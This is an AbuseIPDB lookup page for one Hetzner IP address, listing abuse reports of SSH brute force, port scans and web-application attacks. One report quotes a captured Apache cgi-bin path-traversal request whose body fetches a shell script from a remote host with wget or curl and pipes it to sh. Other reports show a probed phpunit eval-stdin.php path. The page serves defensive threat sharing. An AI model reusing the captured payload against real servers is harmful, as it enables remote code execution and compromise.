JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 178.104.166.148

178.104.166.148 was found in our database!

This IP was reported 30 times. Confidence of Abuse is 40%: ?

40%

ISP	Hetzner Online GmbH
Usage Type	Data Center/Web Hosting/Transit
ASN	AS24940
Hostname(s)	static.148.166.104.178.clients.your-server.de
Domain Name	hetzner.com
Country	🇩🇪 Germany
City	Nurnberg, Bavaria

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 178.104.166.148

Whois 178.104.166.148

IP Abuse Reports for 178.104.166.148:

This IP address has been reported a total of 30 times from 29 distinct sources. 178.104.166.148 was first reported on April 22nd 2026, and the most recent report was 1 month ago.

Old Reports: The most recent abuse report for this IP address is from 1 month ago . It is possible that this IP is no longer involved in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇮🇱 spd.co.il	2026-04-24 07:03:00 (1 month ago)	Unauthorized access attempts on ports: 22	Brute-Force SSH
🇧🇷 SOC-BR	2026-04-23 07:19:36 (1 month ago)	Attack detected by Fortinet - apache: Apache.HTTP.Server.cgi-bin.Path.Traversal - 2026-04-22 04:27:2 ... show more Attack detected by Fortinet - apache: Apache.HTTP.Server.cgi-bin.Path.Traversal - 2026-04-22 04:27:23 - Source Port 42484 show less	Port Scan Hacking
🇨🇳 ThreatBook.io	2026-04-22 23:58:31 (1 month ago)	2026-04-22 14:37:44 /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh,{"body":"(wget ... show more 2026-04-22 14:37:44 /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh,{"body":"(wget --no-check-certificate -qO- https://204.76.203.196/sh \|\| curl -sk https://204.76.203.196/sh) \| sh -s apache.selfrep","content_type":"text/plain","header":{"Accept":["/"],"Connection":["keep-alive"],"Content-Length":["121"],"Content-Type":["text/plain"],"Upgrade-Insecure-Requests":["1"],"User-Agent":["libredtail-http"]},"host":"43.192.38.202:443","method":"POST","proto":"HTTP/1.1","remote_addr":"178.104.166.148:42612","status_code":200,"url":"/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh","user_agent":"libredtail-http"} show less	Web App Attack
🇦🇹 urnilxfgbez	2026-04-22 22:45:00 (1 month ago)	Last 24 Hours suspicious: (DPT=445\|DPT=3389\|DPT=22\|DPT=3306\|DPT=8080\|DPT=23\|DPT=5900\|DPT=1433)	Port Scan
🇮🇹 Progetto1	2026-04-22 08:30:04 (1 month ago)	Multiple exploit attempts	Hacking Brute-Force Exploited Host Web App Attack
Anonymous	2026-04-22 07:58:33 (1 month ago)	Unauthorized connection to Telnet port 23	Port Scan
🇯🇵 VXG-NET	2026-04-22 07:57:38 (1 month ago)	port=80, indicator_type=code-execution	Hacking
🇨🇭 WB	2026-04-22 07:52:03 (1 month ago)	router1: 2026-04-22T07:51:22Z Invalid user orangepi 2026-04-22T07:51:22Z authentication failure; log ... show more router1: 2026-04-22T07:51:22Z Invalid user orangepi 2026-04-22T07:51:22Z authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=static.148.166.104.178.clients.your-server.de 2026-04-22T07:51:23Z Failed password for invalid user orangepi 2026-04-22T07:52:00Z authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=static.148.166.104.178.clients.your-server.de user=root 2026-04-22T07:52:02Z Failed password for root ... show less	Brute-Force SSH
🇨🇭 zynex	2026-04-22 07:39:49 (1 month ago)	URL Probing: /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	Web App Attack
🇨🇦 alexbfr	2026-04-22 07:25:01 (1 month ago)	Fail2Ban Report, sshd jail: banned after 5 failed attempts.	Brute-Force SSH
🇳🇱 Savvii	2026-04-22 07:21:46 (1 month ago)	20 attempts against mh-ssh on star	Brute-Force SSH
🇭🇺 Istvan Rabel	2026-04-22 07:07:22 (1 month ago)	2026-04-22T09:03:19.273244+02:00 dolores sshd[1569908]: Invalid user admin from 178.104.166.148 port ... show more 2026-04-22T09:03:19.273244+02:00 dolores sshd[1569908]: Invalid user admin from 178.104.166.148 port 50054 2026-04-22T09:03:49.650976+02:00 dolores sshd[1573724]: Invalid user orangepi from 178.104.166.148 port 34226 2026-04-22T09:07:21.550892+02:00 dolores sshd[1599181]: Invalid user test from 178.104.166.148 port 46946 ... show less	Brute-Force SSH
🇵🇾 armandosaucedo.me	2026-04-22 07:04:00 (1 month ago)	Threat Intelligence via ARMTI, Web Attack: POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2 ... show more Threat Intelligence via ARMTI, Web Attack: POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh show less	Web App Attack
🇷🇺 Albram	2026-04-22 07:03:40 (1 month ago)	Tries find Web server vulnerability ...	Hacking Web App Attack
🇨🇭 NetEye	2026-04-22 07:03:33 (1 month ago)	SSH brute force login attempt	Brute-Force SSH

Showing 1 to 15 of 30 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇲🇾 47.250.123.22

🇳🇱 4.210.177.132

🇮🇳 113.193.234.210

🇻🇳 113.191.163.114

🇲🇾 49.124.147.248

🇻🇳 14.225.7.70

🇧🇷 189.6.210.225

🇫🇷 164.132.172.225

🇺🇸 157.230.233.200

🇮🇩 114.10.47.235

🇮🇳 103.189.103.102

🇫🇮 89.167.120.76

🇺🇸 47.251.51.155

🇮🇳 27.123.104.142

🇺🇸 20.118.233.215

🇺🇸 20.65.195.23

🇺🇸 20.65.138.86

🇨🇦 15.235.27.241

🇿🇦 13.247.230.214

🇺🇸 167.172.153.23